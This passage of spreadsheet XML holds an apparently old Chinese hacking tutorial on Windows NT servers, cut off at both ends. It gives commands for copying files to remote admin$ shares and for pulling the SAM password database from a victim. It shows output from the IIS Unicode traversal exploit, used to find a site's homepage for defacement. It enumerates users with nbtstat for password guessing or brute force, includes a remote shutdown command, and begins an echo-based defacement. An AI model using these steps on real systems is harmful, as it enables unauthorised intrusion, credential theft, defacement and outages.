        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>www.51.NET,</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>不错的</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>.</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>当我们申请完后，它会给用户名</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>密码</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>以及</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>FTP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>服务器</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>.</t>
    </r>
  </si>
  <si>
    <r>
      <t>在上传前需要登陆先，这里我们假设</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>FTP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>服务器是</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>www.51.NET,</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>用户名是</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>HUCJS,</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>密码是</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>654321</t>
    </r>
  </si>
  <si>
    <t>ftp www.51.net</t>
  </si>
  <si>
    <r>
      <t>他会要求输入用户</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>成功后会要求输入密码</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>.</t>
    </r>
  </si>
  <si>
    <r>
      <t>下面先说上传</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>假设你需上传的文件是</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>INDEX.HTM,</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>它位于</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>C:\\</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>下</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>传到对方</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>D:\\</t>
    </r>
  </si>
  <si>
    <t>get c:\\index.htm d:\\</t>
  </si>
  <si>
    <r>
      <t>假设你要把对方</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>C</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>盘下的</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>INDEX.HTM,</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>下到你的机子的</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>D</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>盘下</t>
    </r>
  </si>
  <si>
    <t>put c:\\index.htm d:\\</t>
  </si>
  <si>
    <t>5:copy</t>
  </si>
  <si>
    <r>
      <t>下面我说说怎样把本地的文件复制到对方硬盘上去，需要建立好</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>IPC$</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连接才有效。</t>
    </r>
  </si>
  <si>
    <r>
      <t>这里我们把本地</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>C</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>盘下的</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>index.htm</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>复制到</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>127.0.0.1</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>的</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>C</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>盘下</t>
    </r>
  </si>
  <si>
    <t>copy index.htm \\\\127.0.0.1\\c$\\index.htm</t>
  </si>
  <si>
    <r>
      <t>如果你要复制到</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>D</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>盘下把</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>C</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>改为</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>D</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>，就行了！</t>
    </r>
  </si>
  <si>
    <t>copy index.htm \\\\127.0.0.1\\d$\\index.htm</t>
  </si>
  <si>
    <r>
      <t>如果你要把他复制到</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>WINNT</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>目录里</t>
    </r>
  </si>
  <si>
    <t>就要把输入</t>
  </si>
  <si>
    <t>copy index.htm \\\\127.0.0.1\\admin$\\index.htm</t>
  </si>
  <si>
    <r>
      <t>admin$</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>是</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>winnt</t>
    </r>
  </si>
  <si>
    <r>
      <t>要把对方的文件复制过来，顺便告诉大家</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>NT</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>的备份的数据库放在</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>x:\\winnt\\repair\\sam._ sam._</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>是数据库的文件名</t>
    </r>
  </si>
  <si>
    <r>
      <t>下面就把</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>127.0.0.1</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>的数据库复制到本地</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>C</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>盘下</t>
    </r>
  </si>
  <si>
    <t>copy \\\\127.0.0.1\\admin$\\repair\\sam._ c:\\</t>
  </si>
  <si>
    <r>
      <t>6</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>：</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>set</t>
    </r>
  </si>
  <si>
    <r>
      <t>如果你跑进了一部机子，而且想黑他（这思想只能在特别时候才准有），当然他的</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>80</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>端口要开，不然你黑给谁看。这时需要用</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>SET</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>命令！</t>
    </r>
  </si>
  <si>
    <t>下面是我得到的结果！我来分析它，只是找主页在那而已。</t>
  </si>
  <si>
    <t>COMPUTERNAME=PENTIUMII</t>
  </si>
  <si>
    <t>ComSpec=D:\\WINNT\\system32\\cmd.exe</t>
  </si>
  <si>
    <t>CONTENT_LENGTH=0</t>
  </si>
  <si>
    <t>GATEWAY_INTERFACE=CGI/1.1</t>
  </si>
  <si>
    <t>HTTP_ACCEPT=*/*</t>
  </si>
  <si>
    <t>HTTP_ACCEPT_LANGUAGE=zh-cn</t>
  </si>
  <si>
    <t>HTTP_CONNECTION=Keep-Alive</t>
  </si>
  <si>
    <r>
      <t>HTTP_HOST=</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>当前登陆者的</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>IP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>，这里本来是显示我的</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>IP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>，被我删除了</t>
    </r>
  </si>
  <si>
    <t>HTTP_ACCEPT_ENCODING=gzip, deflate</t>
  </si>
  <si>
    <t>HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)</t>
  </si>
  <si>
    <t>NUMBER_OF_PROCESSORS=1</t>
  </si>
  <si>
    <t>Os2LibPath=D:\\WINNT\\system32\\os2\\dll;</t>
  </si>
  <si>
    <t>OS=Windows_NT</t>
  </si>
  <si>
    <t>Path=D:\\WINNT\\system32;D:\\WINNT</t>
  </si>
  <si>
    <t>PATHEXT=.COM;.EXE;.BAT;.CMD</t>
  </si>
  <si>
    <r>
      <t>PATH_TRANSLATED=E:\\vlroot</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主页放在的地址，只要你看到</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>PATH_TRANSLATED=</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>的后面就是主页的存放地址。这里是</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>E:\\vlroot</t>
    </r>
  </si>
  <si>
    <t>PROCESSOR_ARCHITECTURE=x86</t>
  </si>
  <si>
    <t>PROCESSOR_IDENTIFIER=x86 Family 6 Model 3 Stepping 3, GenuineIntel</t>
  </si>
  <si>
    <t>PROCESSOR_LEVEL=6</t>
  </si>
  <si>
    <t>PROCESSOR_REVISION=0303</t>
  </si>
  <si>
    <t>PROMPT=$P$G</t>
  </si>
  <si>
    <t>QUERY_STRING=/c+set</t>
  </si>
  <si>
    <t>REMOTE_ADDR=XX.XX.XX.XX</t>
  </si>
  <si>
    <t>REMOTE_HOST=XX.XX.XX.XX</t>
  </si>
  <si>
    <t>REQUEST_METHOD=GET</t>
  </si>
  <si>
    <t>SCRIPT_NAME=/scripts/..%2f../winnt/system32/cmd.exe</t>
  </si>
  <si>
    <t>SERVER_NAME=XX.XX.XX.XX</t>
  </si>
  <si>
    <t>SERVER_PORT=80</t>
  </si>
  <si>
    <t>SERVER_PORT_SECURE=0</t>
  </si>
  <si>
    <t>SERVER_PROTOCOL=HTTP/1.1</t>
  </si>
  <si>
    <r>
      <t>SERVER_SOFTWARE=Microsoft-IIS/3.0</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>对方使用</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>IIS/3.0</t>
    </r>
  </si>
  <si>
    <t>SystemDrive=D:</t>
  </si>
  <si>
    <t>SystemRoot=D:\\WINNT</t>
  </si>
  <si>
    <t>TZ=GMT-9</t>
  </si>
  <si>
    <t>USERPROFILE=D:\\WINNT\\Profiles\\Default User</t>
  </si>
  <si>
    <t>windir=D:\\WINNT</t>
  </si>
  <si>
    <r>
      <t>粉红色的那行就是对方主页存放地址，这里告诉大家一个技巧，很笨的技巧啊，不过只能用这个方法才能</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>100%</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>的找到主页的名称，当你</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>DIR</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>这个目录时，一定会看到很多文件，你可以把所有文件在浏览器这样输入</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>XX.XX.XX.XX/</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>文件名，这样只要看到和</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>XX.XX.XX.XX</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>看到的也面一模一样，那么这就是主页的名称了。</t>
    </r>
  </si>
  <si>
    <r>
      <t>7</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>：</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>nbtstat</t>
    </r>
  </si>
  <si>
    <r>
      <t>如果你扫到一部</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>NT</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>的机子，他的</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>136</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>到</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>139</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>其中一个端口开了的话，就要用这个命令得到用户了。顺便告诉大家这是</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>netbios</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>，得到用户名后就可以猜猜密码了。例如比较简单的密码，密码和用户名一样的，都试下，不行就暴力破解吧！</t>
    </r>
  </si>
  <si>
    <r>
      <t>现在网上很多</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>NT</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>的机子都开了这些端口的，你可以练习下，我们来分析得到的结果。</t>
    </r>
  </si>
  <si>
    <t>命令是</t>
  </si>
  <si>
    <t>nbtstat -A XX.XX.XX.XX</t>
  </si>
  <si>
    <r>
      <t>-A</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>一定要大写哦。</t>
    </r>
  </si>
  <si>
    <t>下面是得到的结果。</t>
  </si>
  <si>
    <t>NetBIOS Remote Machine Name Table</t>
  </si>
  <si>
    <t>Name Type Status</t>
  </si>
  <si>
    <t>---------------------------------------------</t>
  </si>
  <si>
    <t>Registered Registered Registered Registered Registered Registered Registered Reg</t>
  </si>
  <si>
    <t>istered Registered Registered Registered</t>
  </si>
  <si>
    <t>MAC Address = 00-E0-29-14-35-BA</t>
  </si>
  <si>
    <t>PENTIUMII &lt;00&gt; UNIQUE</t>
  </si>
  <si>
    <t>PENTIUMII &lt;20&gt; UNIQUE</t>
  </si>
  <si>
    <t>ORAHOTOWN &lt;00&gt; GROUP</t>
  </si>
  <si>
    <t>ORAHOTOWN &lt;1C&gt; GROUP</t>
  </si>
  <si>
    <t>ORAHOTOWN &lt;1B&gt; UNIQUE</t>
  </si>
  <si>
    <t>PENTIUMII &lt;03&gt; UNIQUE</t>
  </si>
  <si>
    <t>INet~Services &lt;1C&gt; GROUP</t>
  </si>
  <si>
    <t>IS~PENTIUMII...&lt;00&gt; UNIQUE</t>
  </si>
  <si>
    <t>ORAHOTOWN &lt;1E&gt; GROUP</t>
  </si>
  <si>
    <t>ORAHOTOWN &lt;1D&gt; UNIQUE</t>
  </si>
  <si>
    <t>..__MSBROWSE__.&lt;01&gt; GROUP</t>
  </si>
  <si>
    <r>
      <t>粉红色的就是登陆过这部系统的用户，可能你不知道怎么看，大家是不是看到了一窜数字，只要这窜数字是</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>&lt;03&gt;</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>的话，那他前面的就是用户。</t>
    </r>
  </si>
  <si>
    <r>
      <t>这里的用户是</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>PENTIUMII</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>。</t>
    </r>
  </si>
  <si>
    <r>
      <t>8</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>：</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Shutdown</t>
    </r>
  </si>
  <si>
    <r>
      <t>关了对方的</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>NT</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>服务器的命令</t>
    </r>
  </si>
  <si>
    <r>
      <t>Shutdown \\\\IP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>地址</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> t:20</t>
    </r>
  </si>
  <si>
    <r>
      <t>20</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>秒后将</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>NT</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>自动关闭，三思后才能运行这个命令，这样对对方造很大的损失，要做个有良心的入侵者呀。</t>
    </r>
  </si>
  <si>
    <r>
      <t>9</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>：</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>DIR</t>
    </r>
  </si>
  <si>
    <t>这个命令没什么好讲，但是却非常重要，他是查看一目录里的所有文件、文件夹。</t>
  </si>
  <si>
    <t>你可以本地试下。</t>
  </si>
  <si>
    <r>
      <t>10</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>：</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>echo</t>
    </r>
  </si>
  <si>
    <r>
      <t>著名的漏洞</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Unicode</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>，这个命令可以简单的黑一下有这个漏洞的主机。</t>
    </r>
  </si>
  <si>
    <r>
      <t>我们假设我们要把“南京大屠杀铁证如山，任何日本人不得抵赖！”写入</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>index.htm</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
